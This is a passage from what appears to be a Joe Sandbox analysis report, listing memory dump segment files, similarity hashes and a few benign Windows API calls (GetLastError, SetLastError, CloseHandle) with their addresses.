                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLastLocal$AllocFree
                                • String ID:
                                • API String ID: 1353762364-0
                                • Opcode ID: ffc37a13f114d6a482e4bca438f2c1c9ed3b9cf4aa91c70be571bcb0772160de
                                • Instruction ID: 1e0d0bf768c8be35cf022dc7155aca562c132499e7837adbd78c3d34f8d84f13
                                • Opcode Fuzzy Hash: ffc37a13f114d6a482e4bca438f2c1c9ed3b9cf4aa91c70be571bcb0772160de
                                • Instruction Fuzzy Hash: DB3193B5B05205ABD3108F5DEC49745FBE4FB55711F1082BAED04C3380E7B5A9248BE6
                                APIs
                                • GetLastError.KERNEL32(00000000), ref: 003E56AA
                                • CloseHandle.KERNEL32 ref: 003E56B3
                                • SetLastError.KERNEL32(00000000), ref: 003E56BE
                                • CloseHandle.KERNEL32(00000000), ref: 003E56EA
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast
                                • String ID:
                                • API String ID: 918212764-0
                                • Opcode ID: 5c66c753406c726f844e326796efb3558a63a51be74e6fdff268ad6f7e85b3a0
                                • Instruction ID: 29d8804e4844a0c26542ffa800dce87207aaa97b4baea3351110afd051f2d0ff
                                • Opcode Fuzzy Hash: 5c66c753406c726f844e326796efb3558a63a51be74e6fdff268ad6f7e85b3a0
                                • Instruction Fuzzy Hash: 52F0243120421897CB206F6EBC08A66339DAB86322B000228BE09C32D1DE30DD00C5B8